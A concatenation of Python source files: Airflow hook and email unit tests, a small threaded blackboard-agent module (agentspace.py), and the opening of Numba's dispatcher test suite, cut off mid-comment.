c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
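# Module-level mock used as a pluggable email backend: test_custom_backend
# points the EMAIL_BACKEND config at tests.core.send_email_test and asserts
# this mock was called instead of the default SMTP backend.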
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_subtype='mixed'
)
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.return_value.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
agentspace.py
|
import threading
import time
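# A Block is a single named slot in the shared space: it holds a value, an
# absolute expiry time (0.0 means "never expires"), a priority used to
# arbitrate competing writes, and the list of agents registered to be
# triggered when the value changes.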
class Block:
def __init__(self):
self.value = None
self.validity = 0.0
self.priority = 0.0
self.registered = []
def valid(self):
if self.value is None:
return False
return self.validity == 0.0 or self.validity > time.time()
def set(self, value, validity, priority):
if (not self.valid()) or self.priority <= priority:
self.value = value
self.validity = 0.0 if validity == 0.0 else validity + time.time()
self.priority = priority
return True
else:
return False
def register(self, agent):
self.registered.append(agent)
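# Space is a process-wide blackboard shared by all agents. Its methods are
# called on the class itself (Space.read/write/register) and operate on the
# class-level blocks dict; a write succeeds only if the block is invalid or
# the new priority is at least the current one, and a successful write
# triggers every registered agent.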
class Space:
blocks = dict()
def __init__(self):
pass
@staticmethod
def read(name, dflt):
if name in Space.blocks:
if Space.blocks[name].valid():
return Space.blocks[name].value
else:
return dflt
else:
return dflt
@staticmethod
def write(name, value, validity=0.0, priority=0.0):
#print(name,"=",value)
if name not in Space.blocks:
Space.blocks[name] = Block()
if Space.blocks[name].set(value, validity, priority):
for agent in Space.blocks[name].registered[:]:
if agent.stopped:
Space.blocks[name].registered.remove(agent)
else:
agent.trigger()
@staticmethod
def register(name, agent):
if name not in Space.blocks:
Space.blocks[name] = Block()
Space.blocks[name].register(agent)
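# Agent runs its senseSelectAct() loop in a background thread. It sleeps on an
# Event and wakes either when a block it is registered on is written
# (attach_trigger) or when a periodic timer fires (attach_timer); stop()
# cancels the timer and releases the thread.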
class Agent:
def __init__(self):
self.stopped = False
self.event = threading.Event()
self.timer = None
self.t = threading.Thread(name="agent", target=self.run)
self.t.start()
def attach_trigger(self, name):
Space.register(name, self)
def attach_timer(self, period):
self.period = period
self.timer = threading.Timer(self.period, self.timered_trigger)
self.timer.daemon = True
self.timer.start()
def timered_trigger(self):
self.trigger()
self.attach_timer(self.period)
def receive(self):
self.event.wait()
self.event.clear()
def trigger(self):
self.event.set()
def run(self):
self.init()
while not self.stopped:
self.receive()
if self.stopped:
break
self.senseSelectAct()
def init(self):  # to be overridden
print('I am ready')
def senseSelectAct(self):  # to be overridden
print('I am alive')
def stop(self):
if self.timer is not None:
self.timer.cancel()
self.stopped = True
self.trigger()
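# Demo: a few direct writes/reads exercise priority and validity (the
# priority-1 write with a 2 s validity blocks the priority-0 write until it
# expires), then Agent1 writes a counter every second and Agent2 prints it
# whenever the "a" block changes.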
if __name__ == "__main__":
class Agent1(Agent):
def init(self):
self.attach_timer(1)
self.i = 0
def senseSelectAct(self):
print("agent 1 writes ",self.i)
Space.write("a",self.i)
self.i += 1
class Agent2(Agent):
def __init__(self,arg):
self.arg = arg
super().__init__()
def init(self):
self.attach_trigger("a")
def senseSelectAct(self):
i = Space.read("a",-1)
print("agent 2",self.arg,"reads ",i)
Space.write("a",3,validity=2,priority=1)
Space.write("a",4,priority=0)
time.sleep(1)
print(Space.read("a",-1))
time.sleep(1.1)
print(Space.read("a",-1))
Space.write("a",4,priority=0)
print(Space.read("a",-1))
print("-----")
a1 = Agent1()
a2 = Agent2("x")
print('waiting for 10s')
time.sleep(10)
print('done')
a1.stop()
time.sleep(3)
a2.stop()
|
test_dispatcher.py
|
import errno
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import threading
import warnings
import inspect
import pickle
import weakref
from itertools import chain
from io import StringIO
import numpy as np
from numba import njit, jit, generated_jit, typeof
from numba.core import types, errors, codegen
from numba import _dispatcher
from numba.core.compiler import compile_isolated
from numba.core.errors import NumbaWarning
from numba.tests.support import (TestCase, temp_directory, import_dynamic,
override_env_config, capture_cache_log,
captured_stdout)
from numba.np.numpy_support import as_dtype
from numba.core.caching import _UserWideCacheLocator
from numba.core.dispatcher import Dispatcher
from numba.tests.support import (skip_parfors_unsupported, needs_lapack,
SerialMixin)
from numba.testing.main import _TIMEOUT as _RUNNER_TIMEOUT
import llvmlite.binding as ll
import unittest
from numba.parfors import parfor
_TEST_TIMEOUT = _RUNNER_TIMEOUT - 60.
try:
import jinja2
except ImportError:
jinja2 = None
try:
import pygments
except ImportError:
pygments = None
_is_armv7l = platform.machine() == 'armv7l'
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
def dtype_generated_usecase(a, b, dtype=None):
if isinstance(dtype, (types.misc.NoneType, types.misc.Omitted)):
out_dtype = np.result_type(*(np.dtype(ary.dtype.name)
for ary in (a, b)))
elif isinstance(dtype, (types.DType, types.NumberClass)):
out_dtype = as_dtype(dtype)
else:
raise TypeError("Unhandled Type %s" % type(dtype))
def _fn(a, b, dtype=None):
return np.ones(a.shape, dtype=out_dtype)
return _fn
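# Base class for the dispatcher tests: compile_func() jit-compiles a Python
# function with the class-level jit_args and returns the compiled function
# together with a checker that compares its result against the pure-Python
# version via assertPreciseEqual.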
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
def check_access_is_preventable():
# This exists to check whether it is possible to prevent access to
# a file/directory through the use of `chmod 500`. If a user has
# elevated rights (e.g. root) then writes are likely to be possible
# anyway. Tests that require functioning access prevention are
# therefore skipped based on the result of this check.
tempdir = temp_directory('test_cache')
test_dir = (os.path.join(tempdir, 'writable_test'))
os.mkdir(test_dir)
# assume access prevention is not possible
ret = False
# check a write is possible
with open(os.path.join(test_dir, 'write_ok'), 'wt') as f:
f.write('check1')
# now forbid access
os.chmod(test_dir, 0o500)
try:
with open(os.path.join(test_dir, 'write_forbidden'), 'wt') as f:
f.write('check2')
except (OSError, IOError) as e:
# Check that the cause of the exception is due to access/permission
# as per
# https://github.com/conda/conda/blob/4.5.0/conda/gateways/disk/permissions.py#L35-L37 # noqa: E501
eno = getattr(e, 'errno', None)
if eno in (errno.EACCES, errno.EPERM):
# errno reports access/perm fail so access prevention via
# `chmod 500` works for this user.
ret = True
finally:
os.chmod(test_dir, 0o775)
shutil.rmtree(test_dir)
return ret
_access_preventable = check_access_is_preventable()
_access_msg = "Cannot create a directory to which writes are preventable"
skip_bad_access = unittest.skipUnless(_access_preventable, _access_msg)
class TestDispatcher(BaseTest):
def test_equality(self):
@jit
def foo(x):
return x
@jit
def bar(x):
return x
# Written this way to verify `==` returns a bool (gh-5838). Using
# `assertTrue(foo == foo)` or `assertEqual(foo, foo)` would defeat the
# purpose of this test.
self.assertEqual(foo == foo, True)
self.assertEqual(foo == bar, False)
self.assertEqual(foo == None, False) # noqa: E711
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
# __module__ must match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> "
r"\(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = ("Signature mismatch: %d argument types given, but function "
"takes 2 arguments")
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
Failure in computing the fingerprint cannot affect a nopython=False
function. On the other hand, with nopython=True, a ValueError should
be raised to report the failure with fingerprint.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
def test_serialization(self):
"""
Test serialization of Dispatcher objects
"""
@jit(nopython=True)
def foo(x):
return x + 1
self.assertEqual(foo(1), 2)
# get serialization memo
memo = Dispatcher._memo
Dispatcher._recent.clear()
memo_size = len(memo)
# pickle foo and check memo size
serialized_foo = pickle.dumps(foo)
# increases the memo size
self.assertEqual(memo_size + 1, len(memo))
# unpickle
foo_rebuilt = pickle.loads(serialized_foo)
self.assertEqual(memo_size + 1, len(memo))
self.assertIs(foo, foo_rebuilt)
# do we get the same object even if we delete all the explicit
# references?
id_orig = id(foo_rebuilt)
del foo
del foo_rebuilt
self.assertEqual(memo_size + 1, len(memo))
new_foo = pickle.loads(serialized_foo)
self.assertEqual(id_orig, id(new_foo))
# now clear the recent cache
ref = weakref.ref(new_foo)
del new_foo
Dispatcher._recent.clear()
self.assertEqual(memo_size, len(memo))
# show that deserializing creates a new object
pickle.loads(serialized_foo)
self.assertIs(ref(), None)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_array_dispatch(self):
# for context see issue #2937
def foo(a):
return np.linalg.matrix_power(a, 1)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as the Cartesian product of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# The checks must be run in this order to create the dispatch key
# sequence that causes invalid dispatch noted in #2937.
# The first two should hit the cache as they are aligned, supported
# order and under 5 dimensions. The second two should end up in the
# fallback path as they are misaligned.
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
check("F_contig_misaligned", F_contig_misaligned)
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_immutability_in_array_dispatch(self):
# RO operation in function
def foo(a):
return np.sum(a)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as the Cartesian product of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a, disable_write_bit=False):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
if disable_write_bit:
a.flags.writeable = False
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# all of these should end up in the fallback path as they have no write
# bit set
check("C_contig_aligned", C_contig_aligned, disable_write_bit=True)
check("F_contig_aligned", F_contig_aligned, disable_write_bit=True)
check("C_contig_misaligned", C_contig_misaligned,
disable_write_bit=True)
check("F_contig_misaligned", F_contig_misaligned,
disable_write_bit=True)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_high_dimension_array_dispatch(self):
def foo(a):
return np.linalg.matrix_power(a[0, 0, 0, 0, :, :], 1)
jitfoo = jit(nopython=True)(foo)
def check_properties(arr, layout, aligned):
self.assertEqual(arr.flags.aligned, aligned)
if layout == "C":
self.assertEqual(arr.flags.c_contiguous, True)
if layout == "F":
self.assertEqual(arr.flags.f_contiguous, True)
n = 729
r = 3
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as the Cartesian product of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_aligned, 'C', True)
C_contig_misaligned = tmp[1:].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_misaligned, 'C', False)
F_contig_aligned = C_contig_aligned.T
check_properties(F_contig_aligned, 'F', True)
F_contig_misaligned = C_contig_misaligned.T
check_properties(F_contig_misaligned, 'F', False)
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).\
reshape(r, r, r, r, r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# these should all hit the fallback path as the cache is only for up to
# 5 dimensions
check("F_contig_misaligned", F_contig_misaligned)
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
def test_dispatch_recompiles_for_scalars(self):
# for context #3612, essentially, compiling a lambda x:x for a
# numerically wide type (everything can be converted to a complex128)
# and then calling again with e.g. an int32 would lead to the int32
# being converted to a complex128 whereas it ought to compile an int32
# specialization.
def foo(x):
return x
# jit and compile on dispatch for 3 scalar types, expect 3 signatures
jitfoo = jit(nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 3)
expected_sigs = [(types.complex128,), (types.int32,), (types.bool_,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
# now jit with signatures so recompilation is forbidden
# expect 1 signature and type conversion
jitfoo = jit([(types.complex128,)], nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 1)
expected_sigs = [(types.complex128,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
def test_dispatcher_raises_for_invalid_decoration(self):
# For context see https://github.com/numba/numba/issues/4750.
@jit(nopython=True)
def foo(x):
return x
with self.assertRaises(TypeError) as raises:
jit(foo)
err_msg = str(raises.exception)
self.assertIn(
"A jit decorator was called on an already jitted function", err_msg)
self.assertIn("foo", err_msg)
self.assertIn(".py_func", err_msg)
with self.assertRaises(TypeError) as raises:
jit(BaseTest)
err_msg = str(raises.exception)
self.assertIn("The decorated object is not a function", err_msg)
self.assertIn(f"{type(BaseTest)}", err_msg)
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
Same as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
def test_generated_dtype(self):
f = generated_jit(nopython=True)(dtype_generated_usecase)
a = np.ones((10,), dtype=np.float32)
b = np.ones((10,), dtype=np.float64)
self.assertEqual(f(a, b).dtype, np.float64)
self.assertEqual(f(a, b, dtype=np.dtype('int32')).dtype, np.int32)
self.assertEqual(f(a, b, dtype=np.int32).dtype, np.int32)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x, y=6)'",
str(raises.exception))
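# Hedged illustration (not part of the test suite above): `generated_usecase`
# is defined in a separate support module, but a @generated_jit function of
# roughly the following shape would produce the results asserted in
# TestGeneratedDispatcher (x - y for real arguments, x + y for complex ones,
# with y defaulting to 5). The name and body below are assumptions, shown only
# to clarify that a @generated_jit function receives Numba *types* at compile
# time and returns the implementation to compile for those types.
#
#     @generated_jit(nopython=True)
#     def generated_usecase(x, y=5):
#         # `x` and `y` here are Numba type objects, not runtime values.
#         if isinstance(x, types.Complex):
#             def impl(x, y=5):
#                 return x + y
#         else:
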